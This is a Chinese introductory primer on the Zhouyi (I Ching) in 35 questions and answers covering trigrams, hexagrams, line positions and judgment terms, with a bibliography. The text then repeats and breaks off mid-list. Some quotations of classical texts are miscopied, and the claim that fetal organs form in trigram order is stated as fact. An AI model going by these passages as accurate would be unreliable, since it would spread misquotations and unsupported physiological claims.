易学入门35问

 

易学入门35问

 

易学入门35问
1、 何谓《周易》?
2、 何为《三易》?
3、 《周易》的组成?
4、 《周易》成书于何年?
5、 为什么叫《周易》?
6、 《易传》的基本的内容?
7、 什么是《三易》说?
8、 八卦、六十四卦的组成?
9、 何谓八经卦?
10、八卦的排列方式是怎样的?
11、什么叫先天?什么叫后天?
12、何谓”三才之道”?
13、六爻的爻位是怎样定位的?
14、阴爻、阳爻的表象?
15、爻位的刚柔是怎样确定?
16、什么叫相应和不相应?
17、爻位的吉凶?
18、什么叫作卦?
19、什么叫作象?
20、何谓”八卦之象”?
21、何为”方位之象”?
22、何为”像形之象”?
23、何为”互体之象”?
24、何为”反对之象”?
25、何为”六画之象”?
26、何为”爻位之象”?
27、何谓”承”、”乘”?
28、何谓”比”?
29、何谓”时”、”时义”、”时用”?
30、何谓”卦主”?
31、何谓”卦变”、”爻变”?
32、何谓”旁通”?
33、”吉”、”无咎”、”吝”、”凶”等辞的判断?
34、”元、亨、利、贞”四字的理解?
35、《周易》的四个基本要素?

周易入门35问(一)

1、 问:何谓《周易》。
答:《周易》是我国古代哲学、自然科学与社会科学相结合的一部巨著,历来被尊称中国文化的百科全书,其内涵涉及天文学、气象学、物理学、数学、医学、军事学、气功学等。千百年来,《周易》对我国的哲学、史学、文学、宗教、自然科学及社会科学都有着巨大的影响。

2、 问:何为《三易》。
答:《三易》是指《连山》、《归藏》、《周易》。《连山》是夏代的易学,《归藏》是殷代的易学,《周易》是周代的易学。可惜,《连山》、《归藏》已失传。

3、 问:《周易》的组成。
答:《周易》由《易经》和《易传》两部分组成。
《易经》由卦辞及爻辞组成。共有六十四卦,每卦有六爻,共三百八十四爻。
《易传》有十翼即:彖上、彖下、象上、象下、文言、系辞上、系辞下、说卦、序卦、杂卦十篇。

4、问:《周易》成书于何年?
   答:《易经》又称本经,简称《易》,成书于西周初至晚周,距今约三千年前。
〈易传〉成书于春秋至战国中期,是对易经的注释和发挥。
据称〈周易〉为伏羲、文王、周公、孔子四圣合著,即伏羲画八卦,文王作卦辞,周公著爻辞,孔子撰〈易传〉。

5、问:为什么叫《周易》?
答:(1)因为《周易》完成的时间在周代,所以,周字应该解释为周代。(2)周为周匝,意无所不包,无所不备也。
易,《参同契》讲”日月为易”。《乾凿度》谓:”易者易也,变易也,不易也,变易者,其气也,不易者,其位也。”是说变化在外表的气,不变是本体的位。东汉未年的郑康成提出了著名的三易说:”易一名而含三义:简易一也,变易二也,不易三也”。《说文》里有”日月为易”。
另外,笔者发现”周”字为笔画八画;”易”字也为八画;两字合起来八八为六十四。这里是否暗含《易经》由八宫(八卦)、六十四卦组成。

6、 问:《易传》的基本内容?
答:《易传》有七个题目十篇文章(即十翼):
一:《彖》:分上下二篇,解释《易经》的卦象、卦名和卦辞,不解释爻辞。
二:《象》:也分上下二篇,解释卦、爻辞之文,《象》又分《小象》和《大象》,解卦辞的为《大象》,释爻辞的为《小象》。
三:《文言》:为解释乾、坤两卦之文。
四:《系辞》也分上下两篇,为释卦、爻辞之文。
五:《说卦》:为解说卦象及卦文之文。
六:《序卦》:是对六十四卦排列顺序作解释之卦。
七:《杂卦》是对六十四卦中相反卦义作阐释之文。

7、 问:请介绍一下《三易》说?
答:著名的《三易》说即:简易、变易、不易。
简易:是指世界上的事物再复杂再深奥,一旦人类的智慧达到,就可以把它们转换成人们容易理解和处理的问题,如现在的电脑,就是把复杂的计算程序转换成”0″和”1″这两个简单的符号。
变易:是指世界上的万事万物每时每刻都在变化发展着,没有一样东西是不变的,如果离开这种变化,宇宙万物就难以形成。
不易:是指在宇宙间万物皆变的前提下,还有唯一不变的东西存在,就是能变出万象之物的东西不变。或者说万物皆变的规律是不变的。
我认为,所谓”不易”,就是基本平衡;”变易”就是发展变化,就是不平衡;”简易”就是世界上所有最复杂的事物,可以用最简单的符号(即阴阳二爻)来概括。发展变化、不平衡是绝对的、永恒的,平衡是相对的、暂时的。
8、问:八卦、六十四卦的组成?
答:八卦由乾、兑、离、震、巽、坎、艮、坤八个经卦组成。
六十四卦由乾、垢、遁、否、观、剥、晋、大有、震、豫、解、恒、升、井、大过、随、坎、节、屯、既济、革、丰、明夷、师、艮、贲、大蓄、损、睽、履、中孚、渐、坤、复、临、泰、大壮、快、需、比、巽、小畜、家人、益、无妄、噬嗑、颐、蛊、离、旅、鼎、未济、蒙、涣、讼、同人、兑、困、萃、咸、蹇、谦、小过、归妹组成。

9:何谓八经卦?
答:八经卦就是八卦,八卦是八经卦的简称。在《易经》经文中,用”-”表示阳爻,用”–”表示阴爻,由三个阳爻或三个阴爻,或一个阴爻与两个阳爻,或一个阳爻与两个阴爻组成一个单卦,再由八个经卦互相重合,组成六十四别卦。

10:八卦的排列方试是怎样的?               
答:《周易.系辞》中说:”易有太极,是生两仪,两仪生四象,四象生八卦”。阴阳的变化由太极开始,由太极产生出两仪即阴阳。即有阴阳,使相互感应,阳育阴,阴含阳,于是阴中有阳,阳中有阴,所以阴阳二气,又分为四,名曰四象。四象现在一般是指少阳、老阳、少阴、老阴。
根据先天八卦(又称伏羲八卦)图按其数字排列运行为乾一、兑二、离三、震四、巽五、坎六、艮七、坤八,这就是先天八卦数。
根据先天八卦的次序,我们可以知道人在母腹中,首先开始生头,因为乾为一,次生肺,因为兑为二,次生心,因为离为三,次生肝胆,因为震为四、巽为五,次生肾, 因为坎为六,次生肠胃,因为艮为七,次生肌肉,因为坤为八。
后天八卦传说为周文王所制,又称文王八卦。其排列次序为坎一、坤二、震三、巽四、中五、乾六、兑七、艮八、离九。
先天八卦说的是宇宙形成时的状况,后天八卦说的是宇宙以内的变化和运用的法则。
11、 问:什么叫先天?什么叫后天?
答:世界上的万事万物没有形成以前的状况,叫先天,有了万事万物,那就是后天了。换句话说,人在娘胎里是先天,离开娘胎是后天,先天后天是划分阶段范围的一种界说。

12、问:何谓”三才之道”?
答:三才指天道、地道、人道,即天、地、人。《易传》里说”《易》之为书也,广大悉备。有天道焉,有人道焉,有地道焉。兼三才而两之,故六。六者,非它也,三才之道也。”
在六十四卦中每卦都由六个爻组成,五爻、六爻代表天,三爻、四爻代表人,初爻、二爻代表地。这说明天、地、人是一个相互联系的有机整体,同时它们又各具不同的特点和规律。周易,实际上就是讲天、地、人”三才之道”。’

13、问:六爻的爻位是怎样定位的?
答:一卦有六个爻,分初爻、二爻、三爻、四爻、五爻、上爻。
(一):初爻、三爻、五爻为阳爻,二爻、四爻、上爻为阴爻。
(二):一卦之中上爻为上位。上卦之中爻和下卦之中爻为中位,初爻为下位。
(三):五、六爻为天位;三、四爻为人位;初、二爻为地位。初爻、三爻、五爻为地、人、天之正位。
(四):初爻居内卦之下,四爻居外卦之下位,是为同位。二爻居内卦之中位,五爻居外卦之中位,是为同在中位。三爻居内卦之上、上爻居外卦之上,同在上位。
(五):五爻为尊位,二爻为贱位,为小人之贱。五爻为天之正位,为君位、为尊位。阳居五爻,为阳居尊位。阴居五爻,为阴居尊位。居尊位,象征人居帝王之位,属旺势。
(六):初、三、五爻为阳位,二、四、上爻为阴位。阳爻居阳位、阴爻居阴位,为得位,或称当位、正位、位正、在位。反之,为不得位,或称失位、未当位、位不正。

14、问:请介绍一下阴爻、阳爻?
答:阴爻、阳爻是组成八八六十四卦的基本符号,下面分别介绍。
阳爻:用(-)表示:象阳、象天、象君、象父、象君子、象大人、象男人、象奇数、象阳性之物、象刚、象键、象动等。
阴爻:用(–)表示:象阴、象地、象民、象母、象小人、象女人、象偶数、象柔之状、象静、象轻、象亡物等。
为了区别阴阳属性,阳爻用”九”字,阴爻用”六”字。
阳卦之阳爻,称为”初九”、”九二”、”九三”、”九四”、”九五”、”上九”。
阴卦之阴爻,称为”初六”、”六二”、”六三”、”六四”、”六五”、”上六”。
一卦之中,有阴爻有阳爻,按其所居的爻次,分别在数前加一个阳”九”或阴”六”。
乾卦多一个”用九”爻,坤卦多一个”用六”,因此,这两卦各有七个爻数。其他六十二卦没有这种情况。

15、问:请解释一下爻位的刚柔问题?
答:阴爻在阳爻之下,成为柔者顺从刚之象,如妇女顺从男人、臣民顺从君主等,叫:柔从刚。
阴爻在阳爻上面,是柔者欺刚之象,如女欺男、臣欺君等,叫:柔乘刚。
一卦六个爻,如下面五个爻为刚,上面一个爻为柔,叫:刚胜柔或刚制柔。反之,叫:柔胜刚,柔制刚。
一卦六个爻,如九五爻为阳爻,为刚,上下五个爻为阴,为柔,叫:五柔应一刚,众从五,是五柔维护一刚之态。

16、问:什么叫相应和不相应?
答:所谓相应是指阴爻与阳爻相对应,即阴阳对应。在六爻中初爻与四爻、二爻与五爻、三爻与上爻叫相应。如果两个阳爻处在初爻和四爻的位置上叫不相应,同样,两个阴爻同时在二爻、五爻的位置上,也不相应,或者叫阴阳不和。

17、问:爻位的吉凶是怎样的?
答:《系辞》曰:”二与四,同功而异位,其善不同,二多益,四多惧,近也,柔之为道,不利远者,其要无咎,其用柔中也。三与五,同功而异位,三多凶,五多功,贵贱之等也。其柔危,其刚胜邪?”。这是说二爻与四爻都处于阴位,有相同的功能,但一个在内卦,一个在外卦,所以为”异位”。第二爻爻辞多吉利,第四爻爻辞多恐惧,是因为”二”在下卦的中位,远离”五”的君位,受其牵制较小,二爻居内卦之中,在近处,所以多益。而”四”与”五”离君位接近,容易冒犯得咎,四爻在外卦远处,所以导致时在恐惧之中。”三”与”五”爻都为阳位,其作用相同,但位置不同,三爻处下卦的上位,表示一事物发展到了顶级,与五爻尊位同性相斥,又与上爻相应,而上爻为卑贱之阴位,表示整个事物的消亡阶段,所以三爻多凶险。”五”爻处上卦之中位,处尊贵之位,又与处中位的二爻相应,所以多吉利。

18、问:什么叫作卦?
    答:什么叫作卦?古人说:” 卦者挂也。”他的意思是,卦就是挂起来的现象,它告诉我们宇宙里有八样东西,已经挂在那里,这就是八卦。现在我们简单看一下八卦都代表什么:乾卦代表天,坤卦是地,离卦代表太阳,坎卦代表月亮,震卦代表雷,巽卦代表风,艮卦代表高山、陆地,兑卦代表海洋、河流。这八个大现象,代表着整个宇宙,所有的东西都在这八个现象里了。

19、问:什么是象?
答:关于什么是象,《系辞》的解释是:”易者,象也,象者,像也”。”在天成象,在地成形”。说的通俗点,”象”就是形象、象征。
象有”八卦之象”、”六画之象”、”爻位之象”、”像形之象”、”反对之象”、”方位之象”、”互体之象”、等七种。
《象》是解释《易》的重要组成部分,同时也是周易预测断卦的主要方法。

20、问:何为”八卦之象”?
答:《周易概论》根据《说卦》对”八卦之象”作了如下介绍:
“乾,健也。坤,顺也。震,动也。巽,入也。坎,陷也。离,丽也。艮,止也。兑,说也。
“乾为马。坤为牛。震为龙。巽为鸡。坎为豕。离为雉。艮为狗。兑为羊。
“乾为首。坤为腹。震为足。巽为股。坎为耳。离为目。艮为手。兑为口。
“乾,天也,故称乎父。坤,地也,故称乎母。
“震-索而得男,故谓之长男。巽-索而得女,故谓之中女。艮三索而得男,故谓之少男。兑三索而得女,故谓之少女。
“乾为天”,为圜,为君,为父,为玉,为金,为寒,为冰,为大赤,为良马,为老马,为瘠马,为驳马,为木果。
“坤为地,为母,为布,为斧,为吝啬,为均,为子母牛,为大舆,为文,为众,为柄,其于地也为黑。
“震为雷,为龙,为玄黄,为大涂,为长子,为决躁,为苍茛竹,为萑苇,其于马也,为善鸣,为作足,为的颡,其于稼也,为反生。其究为健,为蕃鲜。
“巽为木,为风,为长女,为绳直,为工,为白,为长,为高,为进退,为不果,为臭,其于人也,为寡发,为广颡,为多白眼,为近利市三倍,其究为躁卦。
“坎为水,为沟渎,为隐伏,为矫鞣,为弓轮,其于人也,为加忧,为心病,为耳痛。为血卦,为赤,其于马也,为美脊,为亟心,为下首,为薄蹄,为曳,其于舆也,为多眚,为通,为月,为盗,其于木也,为坚多心。
“离为火,为日,为电,为中女,为甲胃,为戈兵,其于人也,为大腹,为乾卦,为鳖,为赢,为蟹,为蚌,为龟,其于木也,为科上槁。
“艮为山,为径路,为小石,为门阙,为阍寺,为指,为狗,为鼠,为黔喙之属,其于木也,为坚多节。
“兑为泽,为少女。为巫,为口舌,为毁折,为附决,其于地也,为刚卤,为妾,为羊。”
以上就是”八卦之象”。

21、问:何为”方位之象”?
答:方位之象指的是八卦所象征的八个方位。即乾为西北;坎为正北;艮为东北;震为正东;巽为东南;离为正南;坤为西南;兑为正西。

22、问:何为”像形之象”?
答:像形之象就是组成该卦所具有的形象。如乾卦象天,坤卦象地,震卦象雷,巽卦象风,坎卦象水,离卦象火,艮卦象山,兑卦象泽。

23、问:何为”互体之象”?
答:”互体之象”是指在一个卦里,由二爻、三爻、四爻和三爻、四爻、五爻新组成的两个卦,这种由内卦和外卦交互组成的新的卦象,就叫”互象”或者叫 “互体之象”。

24、问:何为”反对之象”?
答:”反对之象”是指将一个六画之象颠倒过来,它就成了一个新的卦体。如《讼》卦颠倒后是《需》卦,它们两卦互为”反对之象”。

25、问:何为”六画之象”?
答:内卦外卦(即上下两卦)相重而成为六画之象,这六个爻画(即六十四卦卦体)根据它们的排列分为初爻、二爻、三爻、四爻、五爻,上爻;分成”天”、”地”、”人”等。(关于它们的含义前面已解释,这里不再叙述)。

26、问:何为”爻位之象”?
    答:所谓爻位就是每一爻在卦中所处的位置,根据它们所处的不同位置,其所象征的内容亦不同。如初爻之象,象征事物的开始阶段,二爻象征事物的变化阶段,三爻象征发展阶段,四爻象征进步发展阶段,五爻象征成功阶段,上爻象征发展到尽头。如果以六爻表示行政机关里不同级别人物,初爻象征办事员;二爻象征科员;三爻象征科长;四爻象征处长;五爻象征局长;六爻象征顾问。
27、问:何谓”承”、”乘”?
答:”承”、”乘”是指在一卦中,相邻的两个爻,上方的爻,对下方的爻是”承”;下方的爻,对上方的爻是”乘”。

28、问:何谓”比”?
答:”比”是两个相邻的爻,有一种相亲密的关系,当然必须是阴与阳,才有亲近感。如”初爻”与”二爻”,”二爻”与”三爻”,”三爻”与”四爻”,”四爻”与”五爻”,”五爻”与”上爻”相比。

29、问:何谓”时”、”时义”、”时用”?
答:所谓”时”,是说根据事物所处的不同时间、地点等条件,预测吉凶,以决定进退。
    ”时义”是说为卦的时间意义。
    ”时用”是说为卦的时间效用。

30、问:何谓”卦主”?
答:”卦主”是说在一卦中,有一爻占据该卦的主导地位,这一爻就是卦主。物以稀为贵,如五阴一阳卦,则阳爻为卦主,五阳一阴卦,则阴爻为卦主。
31、问:何谓”卦变”、”爻变”?
答:”卦变”是说某卦是从某卦而来的,这种卦与卦之间的变化关系,称为”卦变”。
   ”爻变”一是指阴阳爻自身性质的变化,即阴变阳或阳变阴;二是指一爻与另一爻的互相易位所引起的变化。

32、问:何谓”旁通”?
答:”旁通”是说一卦与另一卦相对应的爻相好相反。

33、问:请解释一下”吉”、”无咎”、”吝”、”凶”等的判断辞?
答:”吉”是吉祥。”吉”又分吉、初吉、贞吉、大吉、元吉。
   ”无咎”是没有灾难、过错,虽然不是吉,但也不是凶。”咎”又分为咎、匪咎、何咎、无咎。
“悔”是后悔,困厄。”悔”有有悔、无悔、悔亡、悔有悔。
“吝”是羞辱,艰难。虽然不是凶,但也是恶运。”吝”又分吝、小吝、终吝、贞吝。
“凶”是凶恶,凶险。”凶”有凶、终凶、有凶、贞凶。

34、问:请解释一下”元、亨、利、贞”四字?
答:”元”有大与始的含意。”元”又分元吉、元亨、元夫。
   ”亨”是通的意思。”亨”又分亨、小亨、元亨。
   ”利”是祥和。”利”又分无不利、无所利、利某或不利某、利贞。
   ”贞”是正与固的意思。”贞”又分贞吉、贞凶、贞厉、可贞、利贞。
有关”元、亨、利、贞”及”吉、无咎、吝、凶”的详细解释请参看《周易古经今注》等有关篇章。

35、问:请谈谈《周易》的四个基本要素?
答:”象、数、理、占”是历代易学的四个基本要素。
   ”象”谓卦爻之象,指卦爻画所表征的物象及物象状态。
“数”是指在筮占中,带有算术演算或数学运算性质的分数道具,以及由分数道具所求得的各不同数值,及其奇偶之别。
“理”有义理与易理之分。易理就是《易》之理。指由《周易》及易学的一整套独特语言与范畴所表达的,并借助《周易》及易学所独具的象与数或象数模式所展示的,宇宙间一切天人宇宙之理。义理是指由卦爻象数及卦爻辞所引发的人事之理。
“占”即占筮。

《周易入门35问》主要参考书目

《占易秘解》:清.张丙哲
《易隐》:清.曹九锡
《紫微斗数》:宋.陈抟
《邵子神数》:宋.邵雍 邵康节
《子平真诠:清.沈孝瞻
《河洛理数》:宋.陈抟 邵康节
《滴天髓》:明.刘伯温
《卜筮正宗》:清.王洪绪
《神峰通考》:明.张楠
《周易尚氏学》:清.尚秉和
《周易与中医学》:杨力
《白话易经》:孙振声
《周易概论》:刘大钧
《周易古经白话解》:刘大钧 林忠军
《周易传文白话解》:刘大钧 林忠军
《实用易经预测方法》:冯精志
《易经杂说》:南怀瑾
《周易研究》杂志:中国周易学会、山东大学主办
《破释周易》:韩永贤
《周易与预测学指南》:廖墨香
《周易与现代经济预测》:廖墨香
《周易与预测学》:邵伟华
《大易集要》:刘大钧主编 齐鲁书社出版
《纳甲筮法》:刘大钧

易学入门35问

 

易学入门35问

 

易学入门35问
1、 何谓《周易》?
2、 何为《三易》?
3、 《周易》的组成?
4、 《周易》成书于何年?
5、 为什么叫《周易》?
6、 《易传》的基本的内容?
7、 什么是《三易》说?
8、 八卦、六十四卦的组成?
9、 何谓八经卦?
10、八卦的排列方式是怎样的?
11、什么叫先天?什么叫后天?
12、何谓”三才之道”?
13、六爻的爻位是怎样定位的?
14、阴爻、阳爻的表象?
15、爻位的刚柔是怎样确定?
16、什么叫相应和不相应?
17、爻位的吉凶?
18、什么叫作卦?
19、什么叫作象?
20、何谓”八卦之象”?
21、何为”方位之象”?
22、何为”像形之象”?
23、何为”互体之象”?
24、何为”反对之象”?
25、何为”六画之象”?
26、何为”爻位之象”?
27、何谓”承”、”乘”?
28、何谓”比”?
29、何谓”时”、”时义”、”时用”?
30、何谓”卦主”?
31、何谓”卦变”、”爻变”?
32、何谓”旁通”?
33、”吉”、”无咎”、”吝”、”凶”等辞的判断?
34、”元、亨、利、贞”四字的理解?
35、《周易》的四个基本要素?

周易入门35问(一)

1、 问:何谓《周易》。
答:《周易》是我国古代哲学、自然科学与社会科学相结合的一部巨著,历来被尊称中国文化的百科全书,其内涵涉及天文学、气象学、物理学、数学、医学、军事学、气功学等。千百年来,《周易》对我国的哲学、史学、文学、宗教、自然科学及社会科学都有着巨大的影响。

2、 问:何为《三易》。
答:《三易》是指《连山》、《归藏》、《周易》。《连山》是夏代的易学,《归藏》是殷代的易学,《周易》是周代的易学。可惜,《连山》、《归藏》已失传。

3、 问:《周易》的组成。
答:《周易》由《易经》和《易传》两部分组成。
《易经》由卦辞及爻辞组成。共有六十四卦,每卦有六爻,共三百八十四爻。
《易传》有十翼即:彖上、彖下、象上、象下、文言、系辞上、系辞下、说卦、序卦、杂卦十篇。

4、问:《周易》成书于何年?
   答:《易经》又称本经,简称《易》,成书于西周初至晚周,距今约三千年前。
〈易传〉成书于春秋至战国中期,是对易经的注释和发挥。
据称〈周易〉为伏羲、文王、周公、孔子四圣合著,即伏羲画八卦,文王作卦辞,周公著爻辞,孔子撰〈易传〉。

5、问:为什么叫《周易》?
答:(1)因为《周易》完成的时间在周代,所以,周字应该解释为周代。(2)周为周匝,意无所不包,无所不备也。
易,《参同契》讲”日月为易”。《乾凿度》谓:”易者易也,变易也,不易也,变易者,其气也,不易者,其位也。”是说变化在外表的气,不变是本体的位。东汉未年的郑康成提出了著名的三易说:”易一名而含三义:简易一也,变易二也,不易三也”。《说文》里有”日月为易”。
另外,笔者发现”周”字为笔画八画;”易”字也为八画;两字合起来八八为六十四。这里是否暗含《易经》由八宫(八卦)、六十四卦组成。

6、 问:《易传》的基本内容?
答:《易传》有七个题目十篇文章(即十翼):
一:《彖》:分上下二篇,解释《易经》的卦象、卦名和卦辞,不解释爻辞。
二:《象》:也分上下二篇,解释卦、爻辞之文,《象》又分《小象》和《大象》,解卦辞的为《大象》,释爻辞的为《小象》。
三:《文言》:为解释乾、坤两卦之文。
四:《系辞》也分上下两篇,为释卦、爻辞之文。
五:《说卦》:为解说卦象及卦文之文。
六:《序卦》:是对六十四卦排列顺序作解释之卦。
七:《杂卦》是对六十四卦中相反卦义作阐释之文。

7、 问:请介绍一下《三易》说?
答:著名的《三易》说即:简易、变易、不易。
简易:是指世界上的事物再复杂再深奥,一旦人类的智慧达到,就可以把它们转换成人们容易理解和处理的问题,如现在的电脑,就是把复杂的计算程序转换成”0″和”1″这两个简单的符号。
变易:是指世界上的万事万物每时每刻都在变化发展着,没有一样东西是不变的,如果离开这种变化,宇宙万物就难以形成。
不易:是指在宇宙间万物皆变的前提下,还有唯一不变的东西存在,就是能变出万象之物的东西不变。或者说万物皆变的规律是不变的。
我认为,所谓”不易”,就是基本平衡;”变易”就是发展变化,就是不平衡;”简易”就是世界上所有最复杂的事物,可以用最简单的符号(即阴阳二爻)来概括。发展变化、不平衡是绝对的、永恒的,平衡是相对的、暂时的。
8、问:八卦、六十四卦的组成?
答:八卦由乾、兑、离、震、巽、坎、艮、坤八个经卦组成。
六十四卦由乾、垢、遁、否、观、剥、晋、大有、震、豫、解、恒、升、井、大过、随、坎、节、屯、既济、革、丰、明夷、师、艮、贲、大蓄、损、睽、履、中孚、渐、坤、复、临、泰、大壮、快、需、比、巽、小畜、家人、益、无妄、噬嗑、颐、蛊、离、旅、鼎、未济、蒙、涣、讼、同人、兑、困、萃、咸、蹇、谦、小过、归妹组成。

9:何谓八经卦?
答:八经卦就是八卦,八卦是八经卦的简称。在《易经》经文中,用”-”表示阳爻,用”–”表示阴爻,由三个阳爻或三个阴爻,或一个阴爻与两个阳爻,或一个阳爻与两个阴爻组成一个单卦,再由八个经卦互相重合,组成六十四别卦。

10:八卦的排列方试是怎样的?               
答:《周易.系辞》中说:”易有太极,是生两仪,两仪生四象,四象生八卦”。阴阳的变化由太极开始,由太极产生出两仪即阴阳。即有阴阳,使相互感应,阳育阴,阴含阳,于是阴中有阳,阳中有阴,所以阴阳二气,又分为四,名曰四象。四象现在一般是指少阳、老阳、少阴、老阴。
根据先天八卦(又称伏羲八卦)图按其数字排列运行为乾一、兑二、离三、震四、巽五、坎六、艮七、坤八,这就是先天八卦数。
根据先天八卦的次序,我们可以知道人在母腹中,首先开始生头,因为乾为一,次生肺,因为兑为二,次生心,因为离为三,次生肝胆,因为震为四、巽为五,次生肾, 因为坎为六,次生肠胃,因为艮为七,次生肌肉,因为坤为八。
后天八卦传说为周文王所制,又称文王八卦。其排列次序为坎一、坤二、震三、巽四、中五、乾六、兑七、艮八、离九。
先天八卦说的是宇宙形成时的状况,后天八卦说的是宇宙以内的变化和运用的法则。
11、 问:什么叫先天?什么叫后天?
答:世界上的万事万物没有形成以前的状况,叫先天,有了万事万物,那就是后天了。换句话说,人在娘胎里是先天,离开娘胎是后天,先天后天是划分阶段范围的一种界说。

12、问:何谓”三才之道”?
答:三才指天道、地道、人道,即天、地、人。《易传》里说”《易》之为书也,广大悉备。有天道焉,有人道焉,有地道焉。兼三才而两之,故六。六者,非它也,三才之道也。”
在六十四卦中每卦都由六个爻组成,五爻、六爻代表天,三爻、四爻代表人,初爻、二爻代表地。这说明天、地、人是一个相互联系的有机整体,同时它们又各具不同的特点和规律。周易,实际上就是讲天、地、人”三才之道”。’

13、问:六爻的爻位是怎样定位的?
答:一卦有六个爻,分初爻、二爻、三爻、四爻、五爻、上爻。
(一):初爻、三爻、五爻为阳爻,二爻、四爻、上爻为阴爻。
(二):一卦之中上爻为上位。上卦之中爻和下卦之中爻为中位,初爻为下位。
(三):五、六爻为天位;三、四爻为人位;初、二爻为地位。初爻、三爻、五爻为地、人、天之正位。
(四):初爻居内卦之下,四爻居外卦之下位,是为同位。二爻居内卦之中位,五爻居外卦之中位,是为同在中位。三爻居内卦之上、上爻居外卦之上,同在上位。
(五):五爻为尊位,二爻为贱位,为小人之贱。五爻为天之正位,为君位、为尊位。阳居五爻,为阳居尊位。阴居五爻,为阴居尊位。居尊位,象征人居帝王之位,属旺势。
(六):初、三、五爻为阳位,二、四、上爻为阴位。阳爻居阳位、阴爻居阴位,为得位,或称当位、正位、位正、在位。反之,为不得位,或称失位、未当位、位不正。

14、问:请介绍一下阴爻、阳爻?
答:阴爻、阳爻是组成八八六十四卦的基本符号,下面分别介绍。
阳爻:用(-)表示:象阳、象天、象君、象父、象君子、象大人、象男人、象奇数、象阳性之物、象刚、象键、象动等。
阴爻:用(–)表示:象阴、象地、象民、象母、象小人、象女人、象偶数、象柔之状、象静、象轻、象亡物等。
为了区别阴阳属性,阳爻用”九”字,阴爻用”六”字。
阳卦之阳爻,称为”初九”、”九二”、”九三”、”九四”、”九五”、”上九”。
阴卦之阴爻,称为”初六”、”六二”、”六三”、”六四”、”六五”、”上六”。
一卦之中,有阴爻有阳爻,按其所居的爻次,分别在数前加一个阳”九”或阴”六”。
乾卦多一个”用九”爻,坤卦多一个”用六”,因此,这两卦各有七个爻数。其他六十二卦没有这种情况。

15、问:请解释一下爻位的刚柔问题?
答:阴爻在阳爻之下,成为柔者顺从刚之象,如妇女顺从男人、臣民顺从君主等,叫:柔从刚。
阴爻在阳爻上面,是柔者欺刚之象,如女欺男、臣欺君等,叫:柔乘刚。
一卦六个爻,如下面五个爻为刚,上面一个爻为柔,叫:刚胜柔或刚制柔。反之,叫:柔胜刚,柔制刚。
一卦六个爻,如九五爻为阳爻,为刚,上下五个爻为阴,为柔,叫:五柔应一刚,众从五,是五柔维护一刚之态。

16、问:什么叫相应和不相应?
答:所谓相应是指阴爻与阳爻相对应,即阴阳对应。在六爻中初爻与四爻、二爻与五爻、三爻与上爻叫相应。如果两个阳爻处在初爻和四爻的位置上叫不相应,同样,两个阴爻同时在二爻、五爻的位置上,也不相应,或者叫阴阳不和。

17、问:爻位的吉凶是怎样的?
答:《系辞》曰:”二与四,同功而异位,其善不同,二多益,四多惧,近也,柔之为道,不利远者,其要无咎,其用柔中也。三与五,同功而异位,三多凶,五多功,贵贱之等也。其柔危,其刚胜邪?”。这是说二爻与四爻都处于阴位,有相同的功能,但一个在内卦,一个在外卦,所以为”异位”。第二爻爻辞多吉利,第四爻爻辞多恐惧,是因为”二”在下卦的中位,远离”五”的君位,受其牵制较小,二爻居内卦之中,在近处,所以多益。而”四”与”五”离君位接近,容易冒犯得咎,四爻在外卦远处,所以导致时在恐惧之中。”三”与”五”爻都为阳位,其作用相同,但位置不同,三爻处下卦的上位,表示一事物发展到了顶级,与五爻尊位同性相斥,又与上爻相应,而上爻为卑贱之阴位,表示整个事物的消亡阶段,所以三爻多凶险。”五”爻处上卦之中位,处尊贵之位,又与处中位的二爻相应,所以多吉利。

18、问:什么叫作卦?
    答:什么叫作卦?古人说:” 卦者挂也。”他的意思是,卦就是挂起来的现象,它告诉我们宇宙里有八样东西,已经挂在那里,这就是八卦。现在我们简单看一下八卦都代表什么:乾卦代表天,坤卦是地,离卦代表太阳,坎卦代表月亮,震卦代表雷,巽卦代表风,艮卦代表高山、陆地,兑卦代表海洋、河流。这八个大现象,代表着整个宇宙,所有的东西都在这八个现象里了。

19、问:什么是象?
答:关于什么是象,《系辞》的解释是:”易者,象也,象者,像也”。”在天成象,在地成形”。说的通俗点,”象”就是形象、象征。
象有”八卦之象”、”六画之象”、”爻位之象”、”像形之象”、”反对之象”、”方位之象”、”互体之象”、等七种。
《象》是解释《易》的重要组成部分,同时也是周易预测断卦的主要方法。

20、问:何为”八卦之象”?
答:《周易概论》根据《说卦》对”八卦之象”作了如下介绍:
“乾,健也。坤,顺也。震,动也。巽,入也。坎,陷也。离,丽也。艮,止也。兑,说也。
“乾为马。坤为牛。震为龙。巽为鸡。坎为豕。离为雉。艮为狗。兑为羊。
“乾为首。坤为腹。震为足。巽为股。坎为耳。离为目。艮为手。兑为口。
“乾,天也,故称乎父。坤,地也,故称乎母。
“震-索而得男,故谓之长男。巽-索而得女,故谓之中女。艮三索而得男,故谓之少男。兑三索而得女,故谓之少女。
“乾为天”,为圜,为君,为父,为玉,为金,为寒,为冰,为大赤,为良马,为老马,为瘠马,为驳马,为木果。
“坤为地,为母,为布,为斧,为吝啬,为均,为子母牛,为大舆,为文,为众,为柄,其于地也为黑。
“震为雷,为龙,为玄黄,为大涂,为长子,为决躁,为苍茛竹,为萑苇,其于马也,为善鸣,为作足,为的颡,其于稼也,为反生。其究为健,为蕃鲜。
“巽为木,为风,为长女,为绳直,为工,为白,为长,为高,为进退,为不果,为臭,其于人也,为寡发,为广颡,为多白眼,为近利市三倍,其究为躁卦。
“坎为水,为沟渎,为隐伏,为矫鞣,为弓轮,其于人也,为加忧,为心病,为耳痛。为血卦,为赤,其于马也,为美脊,为亟心,为下首,为薄蹄,为曳,其于舆也,为多眚,为通,为月,为盗,其于木也,为坚多心。
“离为火,为日,为电,为中女,为甲胃,为戈兵,其于人也,为大腹,为乾卦,为鳖,为赢,为蟹,为蚌,为龟,其于木也,为科上槁。
“艮为山,为径路,为小石,为门阙,为阍寺,为指,为狗,为鼠,为黔喙之属,其于木也,为坚多节。
“兑为泽,为少女。为巫,为口舌,为毁折,为附决,其于地也,为刚卤,为妾,为羊。”
以上就是”八卦之象”。

21、问:何为”方位之象”?
答:方位之象指的是八卦所象征的八个方位。即乾为西北;坎为正北;艮为东北;震为正东;巽为东南;离为正南;坤为西南;兑为正西。

22、问:何为”像形之象”?
答:像形之象就是组成该卦所具有的形象。如乾卦象天,坤卦象地,震卦象雷,巽卦象风,坎卦象水,离卦象火,艮卦象山,兑卦象泽。

23、问:何为”互体之象”?
答:”互体之象”是指在一个卦里,由二爻、三爻、四爻和三爻、四爻、五爻新组成的两个卦,这种由内卦和外卦交互组成的新的卦象,就叫”互象”或者叫 “互体之象”。

24、问:何为”反对之象”?
